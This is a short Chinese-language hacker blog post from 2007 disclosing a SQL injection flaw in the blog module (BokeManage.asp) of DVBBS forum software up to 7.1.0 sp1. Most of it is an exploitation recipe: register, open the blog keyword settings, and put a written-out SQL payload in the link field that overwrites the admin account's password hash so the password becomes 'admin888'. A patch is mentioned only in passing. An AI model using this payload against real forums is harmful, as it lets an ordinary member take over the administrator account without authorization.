Category: 技术文档
2007-03-10 13:42:33 by: h4x0r

DVBBS <= 7.1.0 sp1 博客 远程注入漏洞

Font Size: Large | Medium | Small
PS: 好象是B.C.T的人发现的吧. 后面还是被泄露出来了```

漏洞文件:BokeManage.asp

受影响版本:DVBBS <= 7.1.0 sp1 SQL版

补丁下载: 点击下载

利用方法 (转自守护天使's Blog):

注册会员→ 进入管理博客→关健字设置
随便填

uploads/200703/10_134529_09_170016_nkcq11.jpg


再编辑关健字

uploads/200703/10_134550_09_170037_yvn212.jpg


上面几个还是随便填写。。
在第三个,也就是连接地址这里写入语句
123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--

这样管理员admin 的密码就被改成了admin888
[Last Modified By h4x0r, at 2007-03-17 13:34:23]
Comments Feed Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=830

There is no comment on this article.

Post Comment
Smilies
[smile] [confused] [cool] [cry]
[eek] [angry] [wink] [sweat]
[lol] [stun] [razz] [redface]
[rolleyes] [sad] [yes] [no]
[heart] [star] [music] [idea]
Enable UBB Codes
Auto Convert URL
Show Smilies
Hidden Comment
Username:   Password:   Register Now?
Security Code * Please Enter the Security Code